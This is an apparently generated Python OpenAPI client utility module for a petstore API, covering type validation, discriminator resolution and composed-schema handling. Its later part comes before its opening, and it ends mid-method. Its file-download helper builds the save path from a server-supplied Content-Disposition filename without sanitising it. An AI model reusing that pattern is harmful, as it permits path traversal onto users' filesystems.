            parsed_datetime.hour == 0 and
            parsed_datetime.minute == 0 and
            parsed_datetime.second == 0 and
            parsed_datetime.tzinfo is None and
            8 <= len(data) <= 10
        )
        if looks_like_plain_date:
            raise ValueError("This is a date, not a datetime")
        return parsed_datetime
    except (OverflowError, ValueError) as ex:
        # parse can raise OverflowError
        raise ApiValueError(
            "{0}Failed to parse {1} as {2}".format(
                additional_message, repr(data), klass.__name__
            ),
            path_to_item=path_to_item
        ) from ex
def get_discriminator_class(model_class,
                            discr_name,
                            discr_value, cls_visited):
    """Returns the child class specified by the discriminator.

    Args:
        model_class (OpenApiModel): the model class.
        discr_name (string): the name of the discriminator property.
        discr_value (any): the discriminator value.
        cls_visited (list): list of model classes that have been visited.
            Used to determine the discriminator class without
            visiting circular references indefinitely.

    Returns:
        used_model_class (class/None): the chosen child class that will be used
            to deserialize the data, for example dog.Dog.
            If a class is not found, None is returned.
    """
    if model_class in cls_visited:
        # Already examined this class; stop to avoid infinite recursion
        # on circular references.
        return None
    cls_visited.append(model_class)
    if discr_name in model_class.discriminator:
        mapped = model_class.discriminator[discr_name].get(discr_value)
        if mapped is not None:
            return mapped
    # No direct mapping here, so search related schemas. The discriminator
    # mapping may exist in a descendant (anyOf, oneOf) or ancestor (allOf).
    # Ancestor example: in the GrandparentAnimal -> ParentPet -> ChildCat
    # hierarchy, the discriminator mappings may be defined at any level
    # in the hierarchy.
    # Descendant example: mammal -> whale/zebra/Pig -> BasquePig/DanishPig
    # if we try to make BasquePig from mammal, we need to travel through
    # the oneOf descendant discriminators to find BasquePig.
    composed = model_class._composed_schemas
    related_classes = (composed.get('oneOf', ()) +
                      composed.get('anyOf', ()) +
                      composed.get('allOf', ()))
    for related_cls in related_classes:
        # only schemas that declare their own discriminator can help
        if getattr(related_cls, 'discriminator', None) is None:
            continue
        found = get_discriminator_class(
            related_cls, discr_name, discr_value, cls_visited)
        if found is not None:
            return found
    return None
def deserialize_model(model_data, model_class, path_to_item, check_type,
                      configuration, spec_property_naming):
    """Deserializes model_data to model instance.

    Args:
        model_data (int/str/float/bool/none_type/list/dict): data to instantiate the model
        model_class (OpenApiModel): the model class
        path_to_item (list): path to the model in the received data
        check_type (bool): whether to check the data type for the values in
            the model
        configuration (Configuration): the instance to use to convert files
        spec_property_naming (bool): True if the variable names in the input
            data are serialized names as specified in the OpenAPI document.
            False if the variables names in the input data are python
            variable names in PEP-8 snake case.

    Returns:
        model instance

    Raise:
        ApiTypeError
        ApiValueError
        ApiKeyError
    """
    # Meta kwargs threaded through every model constructor.
    kw_args = dict(_check_type=check_type,
                   _path_to_item=path_to_item,
                   _configuration=configuration,
                   _spec_property_naming=spec_property_naming)
    if issubclass(model_class, ModelSimple):
        # ModelSimple wraps a single value; pass the payload through as-is.
        return model_class(model_data, **kw_args)
    elif isinstance(model_data, list):
        # list payloads are splatted as positional constructor args
        return model_class(*model_data, **kw_args)
    if isinstance(model_data, dict):
        # dict payloads become keyword args alongside the meta kwargs
        kw_args.update(model_data)
        return model_class(**kw_args)
    elif isinstance(model_data, PRIMITIVE_TYPES):
        return model_class(model_data, **kw_args)
    # NOTE(review): any other payload (e.g. None) falls through and implicitly
    # returns None -- presumably nullable handling happens in __new__; verify.
def deserialize_file(response_data, configuration, content_disposition=None):
    """Deserializes body to file

    Saves the response body into a file in a temporary folder, using the
    filename from the `Content-Disposition` header if one is provided.

    Args:
        param response_data (str): the file data to write
        configuration (Configuration): the instance to use to convert files

    Keyword Args:
        content_disposition (str): the value of the Content-Disposition
            header

    Returns:
        (file_type): the deserialized file which is open
            The user is responsible for closing and reading the file
    """
    # reserve a unique path inside the configured temp folder, then free it
    # so it can be re-created (possibly under a server-suggested name)
    handle, path = tempfile.mkstemp(dir=configuration.temp_folder_path)
    os.close(handle)
    os.remove(path)
    if content_disposition:
        match = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
                          content_disposition)
        path = os.path.join(os.path.dirname(path), match.group(1))
    payload = response_data
    if isinstance(payload, str):
        # file contents must be written as bytes
        payload = payload.encode('utf-8')
    with open(path, "wb") as sink:
        sink.write(payload)
    return open(path, "rb")
def attempt_convert_item(input_value, valid_classes, path_to_item,
                         configuration, spec_property_naming, key_type=False,
                         must_convert=False, check_type=True):
    """Tries to coerce input_value into one of the valid_classes, in order.

    Args:
        input_value (any): the data to convert
        valid_classes (any): the classes that are valid
        path_to_item (list): the path to the item to convert
        configuration (Configuration): the instance to use to convert files
        spec_property_naming (bool): True if the variable names in the input
            data are serialized names as specified in the OpenAPI document.
            False if the variables names in the input data are python
            variable names in PEP-8 snake case.
        key_type (bool): if True we need to convert a key type (not supported)
        must_convert (bool): if True we must convert
        check_type (bool): if True we check the type or the returned data in
            ModelComposed/ModelNormal/ModelSimple instances

    Returns:
        instance (any) the fixed item

    Raises:
        ApiTypeError
        ApiValueError
        ApiKeyError
    """
    # try most-specific classes first, and drop classes the value can
    # never coerce into
    valid_classes_ordered = order_response_types(valid_classes)
    valid_classes_coercible = remove_uncoercible(
        valid_classes_ordered, input_value, spec_property_naming)
    if not valid_classes_coercible or key_type:
        # we do not handle keytype errors, json will take care
        # of this for us
        if configuration is None or not configuration.discard_unknown_keys:
            raise get_type_error(input_value, path_to_item, valid_classes,
                                 key_type=key_type)
    for valid_class in valid_classes_coercible:
        try:
            if issubclass(valid_class, OpenApiModel):
                return deserialize_model(input_value, valid_class,
                                         path_to_item, check_type,
                                         configuration, spec_property_naming)
            elif valid_class == file_type:
                return deserialize_file(input_value, configuration)
            return deserialize_primitive(input_value, valid_class,
                                         path_to_item)
        except (ApiTypeError, ApiValueError, ApiKeyError) as conversion_exc:
            if must_convert:
                raise conversion_exc
            # if we have conversion errors when must_convert == False
            # we ignore the exception and move on to the next class
            continue
    # we were unable to convert, must_convert == False
    return input_value
def is_type_nullable(input_type):
    """
    Returns true if None is an allowed value for the specified input_type.

    A type is nullable if at least one of the following conditions is true:
    1. The OAS 'nullable' attribute has been specified,
    1. The type is the 'null' type,
    1. The type is a anyOf/oneOf composed schema, and a child schema is
       the 'null' type.

    Args:
        input_type (type): the class of the input_value that we are
            checking

    Returns:
        bool
    """
    if input_type is none_type:
        return True
    if issubclass(input_type, OpenApiModel) and input_type._nullable:
        return True
    if issubclass(input_type, ModelComposed):
        # oneOf/anyOf composition: nullable when any child schema is nullable
        children = (input_type._composed_schemas.get('oneOf', ()) +
                    input_type._composed_schemas.get('anyOf', ()))
        return any(is_type_nullable(child) for child in children)
    return False
def is_valid_type(input_class_simple, valid_classes):
    """
    Args:
        input_class_simple (class): the class of the input_value that we are
            checking
        valid_classes (tuple): the valid classes that the current item
            should be

    Returns:
        bool
    """
    if input_class_simple in valid_classes:
        return True
    # Only models and the 'null' type can match indirectly, either through
    # a nullable schema or through discriminator mappings.
    if not (issubclass(input_class_simple, OpenApiModel)
            or input_class_simple is none_type):
        return False
    for candidate in valid_classes:
        if input_class_simple is none_type and is_type_nullable(candidate):
            # Schema is oneOf/anyOf and the 'null' type is one of the allowed types.
            return True
        if issubclass(candidate, OpenApiModel) and candidate.discriminator:
            discr_name = next(iter(candidate.discriminator))
            mapped_classes = candidate.discriminator[discr_name].values()
            if is_valid_type(input_class_simple, mapped_classes):
                return True
    return False
def validate_and_convert_types(input_value, required_types_mixed, path_to_item,
                               spec_property_naming, _check_type, configuration=None):
    """Raises a TypeError if there is a problem, otherwise returns value

    Args:
        input_value (any): the data to validate/convert
        required_types_mixed (list/dict/tuple): A list of
            valid classes, or a list tuples of valid classes, or a dict where
            the value is a tuple of value classes
        path_to_item: (list) the path to the data being validated
            this stores a list of keys or indices to get to the data being
            validated
        spec_property_naming (bool): True if the variable names in the input
            data are serialized names as specified in the OpenAPI document.
            False if the variables names in the input data are python
            variable names in PEP-8 snake case.
        _check_type: (boolean) if true, type will be checked and conversion
            will be attempted.
        configuration: (Configuration): the configuration class to use
            when converting file_type items.
            If passed, conversion will be attempted when possible
            If not passed, no conversions will be attempted and
            exceptions will be raised

    Returns:
        the correctly typed value

    Raises:
        ApiTypeError
    """
    results = get_required_type_classes(required_types_mixed, spec_property_naming)
    valid_classes, child_req_types_by_current_type = results
    input_class_simple = get_simple_class(input_value)
    valid_type = is_valid_type(input_class_simple, valid_classes)
    if not valid_type:
        if configuration:
            # if input_value is not valid_type try to convert it
            converted_instance = attempt_convert_item(
                input_value,
                valid_classes,
                path_to_item,
                configuration,
                spec_property_naming,
                key_type=False,
                must_convert=True,
                check_type=_check_type
            )
            return converted_instance
        else:
            raise get_type_error(input_value, path_to_item, valid_classes,
                                 key_type=False)
    # input_value's type is in valid_classes
    if len(valid_classes) > 1 and configuration:
        # there are valid classes which are not the current class
        valid_classes_coercible = remove_uncoercible(
            valid_classes, input_value, spec_property_naming, must_convert=False)
        if valid_classes_coercible:
            converted_instance = attempt_convert_item(
                input_value,
                valid_classes_coercible,
                path_to_item,
                configuration,
                spec_property_naming,
                key_type=False,
                must_convert=False,
                check_type=_check_type
            )
            return converted_instance
    if child_req_types_by_current_type == {}:
        # all types are of the required types and there are no more inner
        # variables left to look at
        return input_value
    inner_required_types = child_req_types_by_current_type.get(
        type(input_value)
    )
    if inner_required_types is None:
        # for this type, there are not more inner variables left to look at
        return input_value
    # Recurse into containers, validating/converting each element IN PLACE.
    if isinstance(input_value, list):
        if input_value == []:
            # allow an empty list
            return input_value
        for index, inner_value in enumerate(input_value):
            inner_path = list(path_to_item)
            inner_path.append(index)
            input_value[index] = validate_and_convert_types(
                inner_value,
                inner_required_types,
                inner_path,
                spec_property_naming,
                _check_type,
                configuration=configuration
            )
    elif isinstance(input_value, dict):
        if input_value == {}:
            # allow an empty dict
            return input_value
        for inner_key, inner_val in input_value.items():
            inner_path = list(path_to_item)
            inner_path.append(inner_key)
            if get_simple_class(inner_key) != str:
                # JSON object keys must be strings
                raise get_type_error(inner_key, inner_path, valid_classes,
                                     key_type=True)
            input_value[inner_key] = validate_and_convert_types(
                inner_val,
                inner_required_types,
                inner_path,
                spec_property_naming,
                _check_type,
                configuration=configuration
            )
    return input_value
def model_to_dict(model_instance, serialize=True):
    """Returns the model properties as a dict

    Args:
        model_instance (one of your model instances): the model instance that
            will be converted to a dict.

    Keyword Args:
        serialize (bool): if True, the keys in the dict will be values from
            attribute_map
    """
    result = {}
    # for composed schemas, also walk the child (allOf/oneOf/anyOf) instances
    model_instances = [model_instance]
    if model_instance._composed_schemas:
        model_instances.extend(model_instance._composed_instances)
    for model_instance in model_instances:
        for attr, value in model_instance._data_store.items():
            if serialize:
                # we use get here because additional property key names do not
                # exist in attribute_map
                attr = model_instance.attribute_map.get(attr, attr)
            if isinstance(value, list):
                if not value:
                    # empty list or None
                    result[attr] = value
                else:
                    res = []
                    for v in value:
                        if isinstance(v, PRIMITIVE_TYPES) or v is None:
                            res.append(v)
                        elif isinstance(v, ModelSimple):
                            # list elements that are ModelSimple are unwrapped
                            res.append(v.value)
                        else:
                            res.append(model_to_dict(v, serialize=serialize))
                    result[attr] = res
            elif isinstance(value, dict):
                # NOTE(review): dict values are recursed when they expose
                # _data_store (which includes ModelSimple), so ModelSimple
                # values inside dicts are NOT unwrapped to .value like list
                # elements are -- confirm this asymmetry is intentional.
                result[attr] = dict(map(
                    lambda item: (item[0],
                                  model_to_dict(item[1], serialize=serialize))
                    if hasattr(item[1], '_data_store') else item,
                    value.items()
                ))
            elif isinstance(value, ModelSimple):
                result[attr] = value.value
            elif hasattr(value, '_data_store'):
                result[attr] = model_to_dict(value, serialize=serialize)
            else:
                result[attr] = value
    return result
def type_error_message(var_value=None, var_name=None, valid_classes=None,
                       key_type=None):
    """Builds the standard invalid-type error message.

    Keyword Args:
        var_value (any): the variable which has the type error
        var_name (str): the name of the variable which has the type error
        valid_classes (tuple): the accepted classes for current_item's
            value
        key_type (bool): True if our item is a key in a dict,
            False if it is a value in a dict or an item in a list
    """
    key_or_value = 'key' if key_type else 'value'
    return (
        "Invalid type for variable '{0}'. Required {1} type {2} and "
        "passed type was {3}".format(
            var_name,
            key_or_value,
            get_valid_classes_phrase(valid_classes),
            type(var_value).__name__,
        )
    )
def get_valid_classes_phrase(input_classes):
    """Returns a string phrase describing what types are allowed
    """
    # sort class names alphabetically for a deterministic message
    sorted_names = sorted(cls.__name__ for cls in input_classes)
    if len(sorted_names) == 1:
        return 'is {0}'.format(sorted_names[0])
    return "is one of [{0}]".format(", ".join(sorted_names))
def convert_js_args_to_python_args(fn):
    """Decorator that remaps serialized (JS) keyword names to python names.

    The remapping only happens when the call carries
    ``_spec_property_naming=True``; otherwise kwargs pass through untouched.
    """
    from functools import wraps

    @wraps(fn)
    def wrapped_init(_self, *args, **kwargs):
        """
        An attribute named `self` received from the api will conflicts with the reserved `self`
        parameter of a class method. During generation, `self` attributes are mapped
        to `_self` in models. Here, we name `_self` instead of `self` to avoid conflicts.
        """
        if kwargs.get('_spec_property_naming', False):
            kwargs = change_keys_js_to_python(kwargs, _self.__class__)
        return fn(_self, *args, **kwargs)
    return wrapped_init
def get_allof_instances(self, model_args, constant_args):
    """
    Args:
        self: the class we are handling
        model_args (dict): var_name to var_value
            used to make instances
        constant_args (dict): var_name to var_value
            used to make instances

    Returns
        composed_instances (list)
    """
    instances = []
    for allof_class in self._composed_schemas['allOf']:
        # no need to handle changing js keys to python because
        # for composed schemas, allof parameters are included in the
        # composed schema and were changed to python keys in __new__
        # keep only the args that the allOf schema actually declares
        kwargs = {name: model_args[name]
                  for name in allof_class.openapi_types
                  if name in model_args}
        kwargs.update(constant_args)
        try:
            instances.append(allof_class(**kwargs))
        except Exception as ex:
            raise ApiValueError(
                "Invalid inputs given to generate an instance of '%s'. The "
                "input data was invalid for the allOf schema '%s' in the composed "
                "schema '%s'. Error=%s" % (
                    allof_class.__name__,
                    allof_class.__name__,
                    self.__class__.__name__,
                    str(ex)
                )
            ) from ex
    return instances
def get_oneof_instance(cls, model_kwargs, constant_kwargs, model_arg=None):
    """
    Find the oneOf schema that matches the input data (e.g. payload).
    If exactly one schema matches the input data, an instance of that schema
    is returned.
    If zero or more than one schema match the input data, an exception is raised.
    In OAS 3.x, the payload MUST, by validation, match exactly one of the
    schemas described by oneOf.

    Args:
        cls: the class we are handling
        model_kwargs (dict): var_name to var_value
            The input data, e.g. the payload that must match a oneOf schema
            in the OpenAPI document.
        constant_kwargs (dict): var_name to var_value
            args that every model requires, including configuration, server
            and path to item.

    Kwargs:
        model_arg: (int, float, bool, str, date, datetime, ModelSimple, None):
            the value to assign to a primitive class or ModelSimple class
            Notes:
            - this is only passed in when oneOf includes types which are not object
            - None is used to suppress handling of model_arg, nullable models are handled in __new__

    Returns
        oneof_instance (instance)
    """
    if len(cls._composed_schemas['oneOf']) == 0:
        return None
    oneof_instances = []
    # Iterate over each oneOf schema and determine if the input data
    # matches the oneOf schemas.
    for oneof_class in cls._composed_schemas['oneOf']:
        # The composed oneOf schema allows the 'null' type and the input data
        # is the null value. This is a OAS >= 3.1 feature.
        if oneof_class is none_type:
            # skip none_types because we are deserializing dict data.
            # none_type deserialization is handled in the __new__ method
            continue
        single_value_input = allows_single_value_input(oneof_class)
        if not single_value_input:
            # transform js keys from input data to python keys in fixed_model_args
            fixed_model_args = change_keys_js_to_python(
                model_kwargs, oneof_class)
            # Extract a dict with the properties that are declared in the oneOf schema.
            # Undeclared properties (e.g. properties that are allowed because of the
            # additionalProperties attribute in the OAS document) are not added to
            # the dict.
            kwargs = {}
            var_names = set(oneof_class.openapi_types.keys())
            for var_name in var_names:
                if var_name in fixed_model_args:
                    kwargs[var_name] = fixed_model_args[var_name]
            # do not try to make a model with no input args
            if len(kwargs) == 0:
                continue
            # and use it to make the instance
            kwargs.update(constant_kwargs)
        try:
            if not single_value_input:
                oneof_instance = oneof_class(**kwargs)
            else:
                # single-value schemas are built from model_arg instead of kwargs
                if issubclass(oneof_class, ModelSimple):
                    oneof_instance = oneof_class(model_arg, **constant_kwargs)
                elif oneof_class in PRIMITIVE_TYPES:
                    oneof_instance = validate_and_convert_types(
                        model_arg,
                        (oneof_class,),
                        constant_kwargs['_path_to_item'],
                        constant_kwargs['_spec_property_naming'],
                        constant_kwargs['_check_type'],
                        configuration=constant_kwargs['_configuration']
                    )
            oneof_instances.append(oneof_instance)
        except Exception:
            # a schema that fails to instantiate simply does not match
            pass
    if len(oneof_instances) == 0:
        raise ApiValueError(
            "Invalid inputs given to generate an instance of %s. None "
            "of the oneOf schemas matched the input data." %
            cls.__name__
        )
    elif len(oneof_instances) > 1:
        raise ApiValueError(
            "Invalid inputs given to generate an instance of %s. Multiple "
            "oneOf schemas matched the inputs, but a max of one is allowed." %
            cls.__name__
        )
    return oneof_instances[0]
def get_anyof_instances(self, model_args, constant_args):
    """
    Args:
        self: the class we are handling
        model_args (dict): var_name to var_value
            The input data, e.g. the payload that must match at least one
            anyOf child schema in the OpenAPI document.
        constant_args (dict): var_name to var_value
            args that every model requires, including configuration, server
            and path to item.

    Returns
        anyof_instances (list)
    """
    instances = []
    anyof_classes = self._composed_schemas['anyOf']
    if len(anyof_classes) == 0:
        return instances
    for anyof_class in anyof_classes:
        # The composed schema allows the 'null' type (OAS >= 3.1);
        # none_type deserialization is handled in the __new__ method, so
        # skip it here.
        if anyof_class is none_type:
            continue
        # transform js keys to python keys in fixed_model_args
        fixed_model_args = change_keys_js_to_python(model_args, anyof_class)
        # keep only the args declared by this anyOf schema
        kwargs = {name: fixed_model_args[name]
                  for name in anyof_class.openapi_types
                  if name in fixed_model_args}
        # do not try to make a model with no input args
        if len(kwargs) == 0:
            continue
        kwargs.update(constant_args)
        try:
            instances.append(anyof_class(**kwargs))
        except Exception:
            # a schema that fails to instantiate simply does not match
            pass
    if len(instances) == 0:
        raise ApiValueError(
            "Invalid inputs given to generate an instance of %s. None of the "
            "anyOf schemas matched the inputs." %
            self.__class__.__name__
        )
    return instances
def get_additional_properties_model_instances(
        composed_instances, self):
    """Return self + composed instances that accept additional properties.

    An instance qualifies when its ``additional_properties_type`` is not
    None; self is always considered first.
    """
    return [
        instance
        for instance in [self] + list(composed_instances)
        if instance.additional_properties_type is not None
    ]
def get_var_name_to_model_instances(self, composed_instances):
    """Map each declared var_name to the instances that declare it.

    self is scanned first, then every composed instance, so a property
    declared in multiple schemas lists all of its holders in order.
    """
    mapping = {}
    for instance in [self] + list(composed_instances):
        for var_name in instance.openapi_types:
            mapping.setdefault(var_name, []).append(instance)
    return mapping
def get_unused_args(self, composed_instances, model_args):
    """Return the model_args that no schema (self or composed) consumed.

    Arguments passed to self were already converted to python names before
    __init__ was called, so self and allOf instances are matched on python
    names while oneOf/anyOf instances are matched on serialized (js) names.
    """
    unused_args = dict(model_args)
    for py_name in self.attribute_map:
        unused_args.pop(py_name, None)
    for instance in composed_instances:
        if instance.__class__ in self._composed_schemas['allOf']:
            for py_name in instance.attribute_map:
                unused_args.pop(py_name, None)
        else:
            for js_name in instance.attribute_map.values():
                unused_args.pop(js_name, None)
    return unused_args
def validate_get_composed_info(constant_args, model_args, self):
    """
    For composed schemas, generate schema instances for
    all schemas in the oneOf/anyOf/allOf definition. If additional
    properties are allowed, also assign those properties on
    all matched schemas that contain additionalProperties.
    Openapi schemas are python classes.

    Exceptions are raised if:
    - 0 or > 1 oneOf schema matches the model_args input data
    - no anyOf schema matches the model_args input data
    - any of the allOf schemas do not match the model_args input data

    Args:
        constant_args (dict): these are the args that every model requires
        model_args (dict): these are the required and optional spec args that
            were passed in to make this model
        self (class): the class that we are instantiating
            This class contains self._composed_schemas

    Returns:
        composed_info (list): length three
            composed_instances (list): the composed instances which are not
                self
            var_name_to_model_instances (dict): a dict going from var_name
                to the model_instance which holds that var_name
                the model_instance may be self or an instance of one of the
                classes in self.composed_instances()
            additional_properties_model_instances (list): a list of the
                model instances which have the property
                additional_properties_type. This list can include self
    """
    # create composed_instances
    composed_instances = []
    allof_instances = get_allof_instances(self, model_args, constant_args)
    composed_instances.extend(allof_instances)
    oneof_instance = get_oneof_instance(self.__class__, model_args, constant_args)
    if oneof_instance is not None:
        composed_instances.append(oneof_instance)
    anyof_instances = get_anyof_instances(self, model_args, constant_args)
    composed_instances.extend(anyof_instances)
    # map variable names to composed_instances
    var_name_to_model_instances = get_var_name_to_model_instances(
        self, composed_instances)
    # set additional_properties_model_instances
    additional_properties_model_instances = (
        get_additional_properties_model_instances(composed_instances, self)
    )
    # set any remaining values
    unused_args = get_unused_args(self, composed_instances, model_args)
    # leftover args are only legal when some schema accepts additional
    # properties, or the configuration discards unknown keys
    if len(unused_args) > 0 and \
            len(additional_properties_model_instances) == 0 and \
            (self._configuration is None or
                not self._configuration.discard_unknown_keys):
        raise ApiValueError(
            "Invalid input arguments input when making an instance of "
            "class %s. Not all inputs were used. The unused input data "
            "is %s" % (self.__class__.__name__, unused_args)
        )
    # no need to add additional_properties to var_name_to_model_instances here
    # because additional_properties_model_instances will direct us to that
    # instance when we use getattr or setattr
    # and we update var_name_to_model_instances in setattr
    return [
        composed_instances,
        var_name_to_model_instances,
        additional_properties_model_instances,
        unused_args
    ]
| 39.449657 | 174 | 0.628721 |
from datetime import date, datetime
import inspect
import io
import os
import pprint
import re
import tempfile
from dateutil.parser import parse
from petstore_api.exceptions import (
ApiKeyError,
ApiAttributeError,
ApiTypeError,
ApiValueError,
)
# alias for NoneType, used throughout to represent the OAS 'null' type
none_type = type(None)
# base class used to recognize file-like values
file_type = io.IOBase
class cached_property(object):
    """Descriptor that caches the result of a zero-argument callable.

    The result is stored on the descriptor itself (under ``result_key``),
    so it is computed once and then shared by every instance of the
    owning class.
    """

    result_key = '_results'

    def __init__(self, fn):
        self._fn = fn

    def __get__(self, instance, cls=None):
        try:
            return vars(self)[self.result_key]
        except KeyError:
            result = self._fn()
            setattr(self, self.result_key, result)
            return result
PRIMITIVE_TYPES = (list, float, int, bool, datetime, date, str, file_type)
def allows_single_value_input(cls):
    """Return True when cls can be constructed from one primitive value.

    True for ModelSimple subclasses and raw primitive types, and for a
    composed schema whose oneOf children include such a type.
    """
    if issubclass(cls, ModelSimple) or cls in PRIMITIVE_TYPES:
        return True
    if issubclass(cls, ModelComposed):
        oneof_children = cls._composed_schemas['oneOf']
        if not oneof_children:
            return False
        for child in oneof_children:
            if allows_single_value_input(child):
                return True
    return False
def composed_model_input_classes(cls):
    """Return the flat list of classes that input data for cls can match.

    Primitive and ModelSimple types match themselves; discriminated models
    expand via get_discriminated_classes; oneOf compositions recurse into
    their children.
    """
    if issubclass(cls, ModelSimple) or cls in PRIMITIVE_TYPES:
        return [cls]
    if issubclass(cls, ModelNormal):
        if cls.discriminator is None:
            return [cls]
        return get_discriminated_classes(cls)
    if issubclass(cls, ModelComposed):
        if not cls._composed_schemas['oneOf']:
            return []
        if cls.discriminator is not None:
            return get_discriminated_classes(cls)
        classes = []
        for child in cls._composed_schemas['oneOf']:
            classes.extend(composed_model_input_classes(child))
        return classes
    return []
class OpenApiModel(object):
    """The base class for all OpenAPI model classes.

    Provides validated attribute storage (set_attribute) and
    discriminator-aware construction (__new__), which may redirect
    instantiation to a child class named by a discriminator property.
    """

    def set_attribute(self, name, value):
        # Validate ``value`` against the declared type for ``name`` (or the
        # additionalProperties type) and store it in the data store.
        path_to_item = []
        if self._path_to_item:
            path_to_item.extend(self._path_to_item)
        path_to_item.append(name)
        if name in self.openapi_types:
            required_types_mixed = self.openapi_types[name]
        elif self.additional_properties_type is None:
            raise ApiAttributeError(
                "{0} has no attribute '{1}'".format(
                    type(self).__name__, name),
                path_to_item
            )
        elif self.additional_properties_type is not None:
            required_types_mixed = self.additional_properties_type
        if get_simple_class(name) != str:
            # attribute names are JSON object keys, so they must be strings
            error_msg = type_error_message(
                var_name=name,
                var_value=name,
                valid_classes=(str,),
                key_type=True
            )
            raise ApiTypeError(
                error_msg,
                path_to_item=path_to_item,
                valid_classes=(str,),
                key_type=True
            )
        if self._check_type:
            value = validate_and_convert_types(
                value, required_types_mixed, path_to_item, self._spec_property_naming,
                self._check_type, configuration=self._configuration)
        if (name,) in self.allowed_values:
            check_allowed_values(
                self.allowed_values,
                (name,),
                value
            )
        if (name,) in self.validations:
            check_validations(
                self.validations,
                (name,),
                value,
                self._configuration
            )
        # write through __dict__ to avoid recursing into __setattr__
        self.__dict__['_data_store'][name] = value

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other

    def __setattr__(self, attr, value):
        """set the value of an attribute using self[attr] = value"""
        self[attr] = value

    def __getattr__(self, attr):
        """get the value of an attribute using self[attr]"""
        return self.__getitem__(attr)

    def __new__(cls, *args, **kwargs):
        # Discriminator-aware construction: may return None (nullable),
        # a oneOf child instance, or an instance of a discriminated subclass.
        if len(args) == 1:
            arg = args[0]
            if arg is None and is_type_nullable(cls):
                # The input data is the 'null' value and the type is nullable.
                return None
            if issubclass(cls, ModelComposed) and allows_single_value_input(cls):
                model_kwargs = {}
                oneof_instance = get_oneof_instance(cls, model_kwargs, kwargs, model_arg=arg)
                return oneof_instance
        visited_composed_classes = kwargs.get('_visited_composed_classes', ())
        if (
            cls.discriminator is None or
            cls in visited_composed_classes
        ):
            # No discriminator to follow, or this class was already visited
            # while walking a discriminator (e.g. making Dog, whose allOf
            # includes Animal: Animal is re-entered with
            # _visited_composed_classes = (Animal,) and must not redirect
            # back to Dog again), so build a plain instance of cls.
            return super(OpenApiModel, cls).__new__(cls)
        # Get the name and value of the discriminator property.
        # The discriminator name is obtained from the discriminator meta-data
        # and the discriminator value is obtained from the input data.
        discr_propertyname_py = list(cls.discriminator.keys())[0]
        discr_propertyname_js = cls.attribute_map[discr_propertyname_py]
        if discr_propertyname_js in kwargs:
            discr_value = kwargs[discr_propertyname_js]
        elif discr_propertyname_py in kwargs:
            discr_value = kwargs[discr_propertyname_py]
        else:
            # The input data does not contain the discriminator property.
            path_to_item = kwargs.get('_path_to_item', ())
            raise ApiValueError(
                "Cannot deserialize input data due to missing discriminator. "
                "The discriminator property '%s' is missing at path: %s" %
                (discr_propertyname_js, path_to_item)
            )
        # Implementation note: the last argument to get_discriminator_class
        # is a list of visited classes. get_discriminator_class may recursively
        # call itself and update the list of visited classes, and the initial
        # value must be an empty list. Hence not using 'visited_composed_classes'
        new_cls = get_discriminator_class(
            cls, discr_propertyname_py, discr_value, [])
        if new_cls is None:
            path_to_item = kwargs.get('_path_to_item', ())
            disc_prop_value = kwargs.get(
                discr_propertyname_js, kwargs.get(discr_propertyname_py))
            raise ApiValueError(
                "Cannot deserialize input data due to invalid discriminator "
                "value. The OpenAPI document has no mapping for discriminator "
                "property '%s'='%s' at path: %s" %
                (discr_propertyname_js, disc_prop_value, path_to_item)
            )
        if new_cls in visited_composed_classes:
            # if we are making an instance of a composed schema Descendent
            # which allOf includes Ancestor, then Ancestor contains
            # a discriminator that includes Descendent.
            # So if we make an instance of Descendent, we have to make an
            # instance of Ancestor to hold the allOf properties.
            # This code detects that use case and makes the instance of Ancestor
            # For example:
            # When making an instance of Dog, _visited_composed_classes = (Dog,)
            # then we make an instance of Animal to include in dog._composed_instances
            # so when we are here, cls is Animal
            # cls.discriminator != None
            # cls not in _visited_composed_classes
            # new_cls = Dog
            # but we know that we already have Dog because it is in
            # visited_composed_classes, so make Animal here
            return super(OpenApiModel, cls).__new__(cls)
        # Build a list containing all oneOf and anyOf descendants.
        oneof_anyof_classes = None
        if cls._composed_schemas is not None:
            oneof_anyof_classes = (
                cls._composed_schemas.get('oneOf', ()) +
                cls._composed_schemas.get('anyOf', ()))
        oneof_anyof_child = new_cls in oneof_anyof_classes
        kwargs['_visited_composed_classes'] = visited_composed_classes + (cls,)
        if cls._composed_schemas.get('allOf') and oneof_anyof_child:
            # Validate that we can make self because when we make the
            # new_cls it will not include the allOf validations in self
            self_inst = super(OpenApiModel, cls).__new__(cls)
            self_inst.__init__(*args, **kwargs)
        new_inst = new_cls.__new__(new_cls, *args, **kwargs)
        new_inst.__init__(*args, **kwargs)
        return new_inst
class ModelSimple(OpenApiModel):
    """Base class for models that wrap a single ``value`` (non-object
    schemas). Attribute access goes through __dict__ directly to avoid
    recursing into OpenApiModel.__getattr__/__setattr__."""

    def __setitem__(self, name, value):
        """Set the value of an attribute; validated unless required/meta."""
        if name in self.required_properties:
            self.__dict__[name] = value
            return
        self.set_attribute(name, value)

    def get(self, name, default=None):
        """Return the value of an attribute or ``default`` if absent."""
        if name in self.required_properties:
            return self.__dict__[name]
        return self.__dict__['_data_store'].get(name, default)

    def __getitem__(self, name):
        """Return the value of an attribute or raise ApiAttributeError."""
        if name in self:
            return self.get(name)
        raise ApiAttributeError(
            "{0} has no attribute '{1}'".format(
                type(self).__name__, name),
            [e for e in [self._path_to_item, name] if e]
        )

    def __contains__(self, name):
        """True when the attribute exists on this instance."""
        if name in self.required_properties:
            return name in self.__dict__
        return name in self.__dict__['_data_store']

    def to_str(self):
        """Return the string representation of the wrapped value."""
        return str(self.value)

    def __eq__(self, other):
        """Models are equal when their wrapped values compare equal."""
        if not isinstance(other, self.__class__):
            return False
        this_val = self._data_store['value']
        that_val = other._data_store['value']
        types = set()
        types.add(this_val.__class__)
        types.add(that_val.__class__)
        vals_equal = this_val == that_val
        return vals_equal
class ModelNormal(OpenApiModel):
    """Base class for object-schema models with named properties stored in
    ``_data_store``. Attribute access goes through __dict__ directly to
    avoid recursing into OpenApiModel.__getattr__/__setattr__."""

    def __setitem__(self, name, value):
        """Set the value of an attribute; validated unless required/meta."""
        if name in self.required_properties:
            self.__dict__[name] = value
            return
        self.set_attribute(name, value)

    def get(self, name, default=None):
        """Return the value of an attribute or ``default`` if absent."""
        if name in self.required_properties:
            return self.__dict__[name]
        return self.__dict__['_data_store'].get(name, default)

    def __getitem__(self, name):
